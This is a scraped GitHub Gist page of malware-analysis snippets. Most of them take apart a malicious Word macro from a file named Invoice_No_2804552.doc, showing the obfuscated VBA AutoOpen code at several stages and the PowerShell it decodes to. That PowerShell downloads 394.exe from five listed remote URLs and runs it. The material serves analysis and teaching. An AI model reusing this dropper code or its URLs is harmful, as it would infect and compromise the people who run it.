Skip to content

Instantly share code, notes, and snippets.

@spencerdodd
spencerdodd / mac_windows_bootable_iso.md
Created June 11, 2019 00:15
create windows bootable iso on macos

windows bootable iso on macOS

just use unetbootin

@spencerdodd
spencerdodd / fully_formatted.ps1
Created November 30, 2018 16:32
fully formatted powershell payload
$urls = @(
"http://jany.be/UsCX",
"http://jfogal.com/C",
"http://inspekservices.co.uk/g",
"http://ilgiardinodellevisciole.it/ny",
"http://www.diman.landesigne.ru/Q"
)
foreach($url in $urls) {
try {
(new-object Net.WebClient).DownloadFile($url, "C:\Users\Public\394.exe")
@spencerdodd
spencerdodd / formatted.ps1
Created November 30, 2018 16:31
formatted powershell payload
$Ywi = new-object Net.WebClient
$jKB = 'http://jany.be/UsCX@http://jfogal.com/C@http://inspekservices.co.uk/g@http://ilgiardinodellevisciole.it/ny@http://www.diman.landesigne.ru/Q'.Split('@')
$LtU = '394'
$jri=$env:public+'\'+$LtU+'.exe'
foreach($JBf in $jKB) {
try {
$Ywi.DownloadFile($JBf, $jri)
Invoke-Item $jri
break
} catch {}
@spencerdodd
spencerdodd / fully_deob_autoopen.vba
Last active November 30, 2018 16:29
fully deobfuscated autoopen
Sub AutoOpen()
payloadString = "CMd /V^:^ON/C"^s^e^t lN=^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^ ^}^}^{^hc^t^ac^}" _
"^;^k^a^er^b^;^ir^j^$^ ^m^etI^-^e^k^ovn^I;)^ir^j^$^ ^,^fB^J^$(^e^l^i^F^d^a^o^ln^w" _
"o^D^.^i^w^Y^$^{^yr^t^{)^B^Kj^$ n^i^ ^f^B^J^$(^hc^a^er^o^f;^'^e^x^e^.^'^+^U^t^L^$" _
"^+^'^\'+c^i^l^b^u^p^:vne^$^=^ir^j^$^;^'^4^9^3^'^ ^=^ ^U^t^L^$^;)^'^@^'(^t^i^l^p" _
"^S^.^'^Q/^ur^.^en^g^i^s^e^dn^a^l^.n^a^m^i^d^.^w^w^w//^:^p^t^t^h@yn/^t^i^.e^l^o^i" _
"c^s^iv^e^l^l^ed^on^i^dra^i^g^l^i//^:^p^t^t^h^@^g/^k^u.^oc^.^s^ec^ivr^e^s^k^e^p^s" _
"n^i//^:^p^t^t^h^@C/^m^oc^.^l^a^g^o^f^j//^:^p^t^t^h@^XC^s^U/^e^b^.^yn^a^j//^:^p^t" _
"^t^h^'^=^B^K^j^$^;^tn^e^i^lC^b^e^W^.^t^eN^ ^tc^e^j^b^o^-^w^en^=^i^w^Y^$^ ^l^l^e^h" _
"^sr^e^w^o^p&&^f^or /^L %^p ^in (^3^4^9^;^-^1^;^0)^d^o ^s^e^t ^l^I=!^l^I!!lN:~%^p," _
@spencerdodd
spencerdodd / near_full_deob_autoopen.vba
Created November 30, 2018 16:12
almost fully deobfuscated autoopen
Sub AutoOpen()
Execute ("CM" + PayloadHalfOne + PayloadHalfTwo)
End Sub
Function PayloadHalfOne()
partOne = "d /V^:^ON/C""^s^e^t lN=^ ^ ^ ^ ^ ^ ^ ^ ^"
partTwo = " ^ ^ ^ ^ ^}^}^{^hc^t^ac^}^;^k^a^er^b^;^ir^j^$^ ^m^etI^-^e^k^ovn^I;)^ir^j^$^ ^,^fB^J^$(^e^l^"
partThree = "i^F^d^a^o^ln^wo^D^.^i^w^Y^$^{^yr^t^{)^B^Kj^$ n^i^ ^f^B^J^$(^hc^a^er^o^f;^'^e^x^e^.^'^+^U^t^L^$^+^'^\'"
partFour = "+c^i^l^b^u^p^:vne^$^=^ir^j^$^;^'⁴⁹³^'^ ^=^ ^U^t^"
partFive = "L^$^;)^'^@^'(^t^i^l^p^S^.^'^Q/^ur^.^en^g^i^s^e^dn^a^l^.n^a^m^i^d^.^w^w^w//^:^p^t^t^h@yn/^t^"
partSix = "i^.e^l^o^ic^s^iv^e^l^l^ed^on^i^dra^i^g^l^i//^:^p^t^t^h^@^g"
@spencerdodd
spencerdodd / autoopen_deob.vba
Created November 30, 2018 16:11
deNOP'd auto open
Sub AutoOpen()
SjonJLuoL (KeyString(10 + 7 + 50) + KeyString(12 + 8 + 57) + DTqpj + vNtBMCjurWl)
End Sub
@spencerdodd
spencerdodd / autoopen.vba
Created November 30, 2018 16:09
autoopen obfuscation
Sub AutoOpen()
SjonJLuoL (KeyString(wwTLriZs + lfKnf + 10 + 7 + 50 + CdBUtfI + iNPLT) + LkwPL + qNIXIW + KeyString(BdpGivaC + ufzLc + 12 + 8 + 57 + tXzCjRS + KGlIA) + DTqpj + vNtBMCjurWl + fWWSlvV + azJobQRV)
End Sub
@spencerdodd
spencerdodd / nopfuscation.vba
Created November 30, 2018 16:08
NOP obfuscation in VBA
Sub AutoOpen()
If WsGQFM Or 2 Then
tBFjh = "TI"
End If
Shell("calc.exe")
End Sub()
@spencerdodd
spencerdodd / de_nopfuscated.vba
Last active November 30, 2018 15:59
payload without nopfuscation
Sub AutoOpen()
SjonJLuoL (KeyString(wwTLriZs + lfKnf + 10 + 7 + 50 + CdBUtfI + iNPLT) + LkwPL + qNIXIW + KeyString(BdpGivaC + ufzLc + 12 + 8 + 57 + tXzCjRS + KGlIA) + DTqpj + vNtBMCjurWl + fWWSlvV + azJobQRV)
End Sub
Function DTqpj()
wjPzoWkSo = "d /V^:^ON/" + "C" + """" + "^s^e^t lN=^ ^ ^" + " ^ ^ ^ ^ ^ ^"
wKGNtc = " ^ ^ ^ ^ ^}^" + "}^{^hc^t^ac^}^;^k^" + "a^er^b^;^ir^j" + "^$^ ^m^etI^-^e^k^ovn" + "^I;)^ir^j^$^ ^," + "^fB^J^$(^e^l^"
LIJaYBX = "i^F^d^a^o^ln^wo^D^." + "^i^w^Y^$^{^yr^t" + "^{)^B^Kj^$ n^" + "i^ ^f^B^J^$(^hc^a^e" + "r^o^f;^'^e^x^e^.^'^+" + "^U^t^L^$^+^'^\'"
AMjHaSCGI = "+c^i^l^b^u^p" + "^:vne^$^=^ir^" + "j^$^;^'49" + "3^'^ ^=^ ^U^t^"
kamHIjcmQ = "L^$^;)^'^@^'" + "(^t^i^l^p^S^." + "^'^Q/^ur^.^e" + "n^g^i^s^e^dn^a^l^.n^" + "a^m^i^d^.^w^w^w//^:" + "^p^t^t^h@yn/^t^"
lYGYPUN = "i^.e^l^o^ic^s^i" + "v^e^l^l^ed^on^" + "i^dra^i^g^l^i" + "//^:^p^t^t^h^@^g"
@spencerdodd
spencerdodd / vba_streams.vba
Created November 30, 2018 15:55
malicious macro source code dump from olevba
'olevba 0.54dev4 - http://decalage.info/python/oletools
'Flags Filename
'-----------------------------------------------------------------
'OLE:MAS-HB-- Invoice_No_2804552.doc
'====================================================================
'FILE: Invoice_No_2804552.doc
'Type: OLE
'--------------------------------------------------------------------
'VBA MACRO izXzCqwwWUCwhk.cls
'in file: Invoice_No_2804552.doc - OLE stream: u'Macros/VBA/izXzCqwwWUCwhk'